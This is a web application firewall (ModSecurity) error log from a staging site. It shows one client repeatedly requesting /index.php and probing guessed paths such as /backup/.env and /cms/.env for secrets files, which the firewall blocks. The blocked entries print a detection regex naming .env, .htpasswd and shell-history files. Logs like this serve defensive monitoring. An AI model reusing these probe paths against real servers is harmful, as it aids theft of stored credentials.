[Tue May 26 15:31:01.298862 2026] [security2:error] [pid 715645:tid 715776] [client 195.178.110.199:41758] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTfgAAAAE"]
[Tue May 26 15:31:01.310880 2026] [security2:error] [pid 715645:tid 715795] [client 195.178.110.199:41706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTgQAAABQ"]
[Tue May 26 15:31:01.313140 2026] [security2:error] [pid 715645:tid 715800] [client 195.178.110.199:41774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTgAAAABk"]
[Tue May 26 15:31:01.315068 2026] [security2:error] [pid 715645:tid 715839] [client 195.178.110.199:41812] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTfwAAAEA"]
[Tue May 26 15:31:01.323289 2026] [security2:error] [pid 715645:tid 715834] [client 195.178.110.199:41794] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTggAAADs"]
[Tue May 26 15:31:01.337086 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgThQAAAHU"]
[Tue May 26 15:31:01.410351 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:41746] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTigAAAG8"]
[Tue May 26 15:31:01.418113 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:41818] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgThgAAAC4"]
[Tue May 26 15:31:01.423119 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTkAAAAEo"]
[Tue May 26 15:31:01.431452 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTlAAAADI"]
[Tue May 26 15:31:01.432803 2026] [security2:error] [pid 715645:tid 715853] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTkwAAAE4"]
[Tue May 26 15:31:01.440229 2026] [security2:error] [pid 715645:tid 715779] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTkgAAAAQ"]
[Tue May 26 15:31:01.449166 2026] [security2:error] [pid 715645:tid 715780] [client 195.178.110.199:41674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTlwAAAAU"]
[Tue May 26 15:31:01.452206 2026] [security2:error] [pid 715645:tid 715815] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTlQAAACg"]
[Tue May 26 15:31:01.474114 2026] [security2:error] [pid 715645:tid 715841] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTmQAAAEI"]
[Tue May 26 15:31:01.519434 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTnQAAADc"]
[Tue May 26 15:31:01.523250 2026] [security2:error] [pid 715645:tid 715850] [client 195.178.110.199:41774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTmwAAAEs"]
[Tue May 26 15:31:01.542971 2026] [security2:error] [pid 715645:tid 715778] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgToQAAAAM"]
[Tue May 26 15:31:01.595282 2026] [security2:error] [pid 715645:tid 715787] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTqwAAAAw"]
[Tue May 26 15:31:01.602088 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTrAAAAGk"]
[Tue May 26 15:31:01.609823 2026] [security2:error] [pid 715645:tid 715832] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTsAAAADk"]
[Tue May 26 15:31:01.631175 2026] [security2:error] [pid 715645:tid 715842] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTswAAAEM"]
[Tue May 26 15:31:01.656778 2026] [security2:error] [pid 715645:tid 715797] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTfQAAABY"]
[Tue May 26 15:31:01.691660 2026] [security2:error] [pid 715645:tid 715859] [client 195.178.110.199:41826] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTtAAAAFQ"]
[Tue May 26 15:31:01.706252 2026] [security2:error] [pid 715645:tid 715808] [client 195.178.110.199:41706] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/back-end/.env"] [unique_id "ahVvXXVGgMGh8k213RgTvAAAACE"]
[Tue May 26 15:31:01.708192 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTtwAAAF4"]
[Tue May 26 15:31:01.713560 2026] [security2:error] [pid 715645:tid 715792] [client 195.178.110.199:41738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/back-api/.env"] [unique_id "ahVvXXVGgMGh8k213RgTvQAAABE"]
[Tue May 26 15:31:01.732090 2026] [security2:error] [pid 715645:tid 715890] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTugAAAHM"]
[Tue May 26 15:31:01.751152 2026] [security2:error] [pid 715645:tid 715823] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTuwAAADA"]
[Tue May 26 15:31:01.782582 2026] [security2:error] [pid 715645:tid 715879] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTwAAAAGg"]
[Tue May 26 15:31:01.792586 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTwwAAAFI"]
[Tue May 26 15:31:01.820488 2026] [security2:error] [pid 715645:tid 715838] [client 195.178.110.199:41788] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTxAAAAD8"]
[Tue May 26 15:31:01.831120 2026] [security2:error] [pid 715645:tid 715872] [client 195.178.110.199:41804] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTyAAAAGE"]
[Tue May 26 15:31:01.834330 2026] [security2:error] [pid 715645:tid 715820] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTxwAAAC0"]
[Tue May 26 15:31:01.853765 2026] [security2:error] [pid 715645:tid 715898] [client 195.178.110.199:41826] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/back/.env"] [unique_id "ahVvXXVGgMGh8k213RgTzAAAAHs"]
[Tue May 26 15:31:01.860517 2026] [security2:error] [pid 715645:tid 715794] [client 195.178.110.199:41818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backend-api/.env"] [unique_id "ahVvXXVGgMGh8k213RgTzgAAABM"]
[Tue May 26 15:31:01.865542 2026] [security2:error] [pid 715645:tid 715892] [client 195.178.110.199:41746] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backend/.env"] [unique_id "ahVvXXVGgMGh8k213RgT0AAAAHU"]
[Tue May 26 15:31:01.899841 2026] [security2:error] [pid 715645:tid 715871] [client 195.178.110.199:41706] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTzQAAAGA"]
[Tue May 26 15:31:01.920013 2026] [security2:error] [pid 715645:tid 715829] [client 195.178.110.199:41738] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgTzwAAADY"]
[Tue May 26 15:31:01.945786 2026] [security2:error] [pid 715645:tid 715886] [client 195.178.110.199:41636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgT0QAAAG8"]
[Tue May 26 15:31:01.950325 2026] [security2:error] [pid 715645:tid 715902] [client 195.178.110.199:41744] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/backup/.env"] [unique_id "ahVvXXVGgMGh8k213RgT1AAAAH8"]
[Tue May 26 15:31:01.966339 2026] [security2:error] [pid 715645:tid 715843] [client 195.178.110.199:41788] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/be/.env"] [unique_id "ahVvXXVGgMGh8k213RgT1wAAAEQ"]
[Tue May 26 15:31:01.977795 2026] [security2:error] [pid 715645:tid 715821] [client 195.178.110.199:41674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgT0gAAAC4"]
[Tue May 26 15:31:01.993394 2026] [security2:error] [pid 715645:tid 715849] [client 195.178.110.199:41794] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgT0wAAAEo"]
[Tue May 26 15:31:02.002671 2026] [security2:error] [pid 715645:tid 715889] [client 195.178.110.199:41726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgT1QAAAHI"]
[Tue May 26 15:31:02.016801 2026] [security2:error] [pid 715645:tid 715825] [client 195.178.110.199:41628] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgT1gAAADI"]
[Tue May 26 15:31:02.034374 2026] [security2:error] [pid 715645:tid 715853] [client 195.178.110.199:41774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXXVGgMGh8k213RgT2AAAAE4"]
[Tue May 26 15:31:02.072666 2026] [security2:error] [pid 715645:tid 715883] [client 195.178.110.199:41804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/beta/.env"] [unique_id "ahVvXnVGgMGh8k213RgT3gAAAGw"]
[Tue May 26 15:31:02.099705 2026] [security2:error] [pid 715645:tid 715777] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT2wAAAAI"]
[Tue May 26 15:31:02.145860 2026] [security2:error] [pid 715645:tid 715811] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT5QAAACQ"]
[Tue May 26 15:31:02.146480 2026] [security2:error] [pid 715645:tid 715830] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT6AAAADc"]
[Tue May 26 15:31:02.199748 2026] [security2:error] [pid 715645:tid 715888] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT6wAAAHE"]
[Tue May 26 15:31:02.207901 2026] [security2:error] [pid 715645:tid 715880] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT8QAAAGk"]
[Tue May 26 15:31:02.220548 2026] [security2:error] [pid 715645:tid 715865] [client 195.178.110.199:41804] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/cms/.env"] [unique_id "ahVvXnVGgMGh8k213RgT-QAAAFo"]
[Tue May 26 15:31:02.225416 2026] [security2:error] [pid 715645:tid 715837] [client 195.178.110.199:41774] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT9QAAAD4"]
[Tue May 26 15:31:02.246828 2026] [security2:error] [pid 715645:tid 715869] [client 195.178.110.199:41818] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.staging.unsobered.com"] [uri "/client/.env"] [unique_id "ahVvXnVGgMGh8k213RgT_gAAAF4"]
[Tue May 26 15:31:02.258577 2026] [security2:error] [pid 715645:tid 715827] [client 195.178.110.199:41674] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT9gAAADQ"]
[Tue May 26 15:31:02.266787 2026] [security2:error] [pid 715645:tid 715855] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT-gAAAFA"]
[Tue May 26 15:31:02.277270 2026] [security2:error] [pid 715645:tid 715893] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgT_QAAAHY"]
[Tue May 26 15:31:02.297638 2026] [security2:error] [pid 715645:tid 715852] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUAQAAAE0"]
[Tue May 26 15:31:02.306313 2026] [security2:error] [pid 715645:tid 715885] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUBAAAAG4"]
[Tue May 26 15:31:02.308874 2026] [security2:error] [pid 715645:tid 715796] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUBwAAABU"]
[Tue May 26 15:31:02.329073 2026] [security2:error] [pid 715645:tid 715857] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVvXnVGgMGh8k213RgUCgAAAFI"]
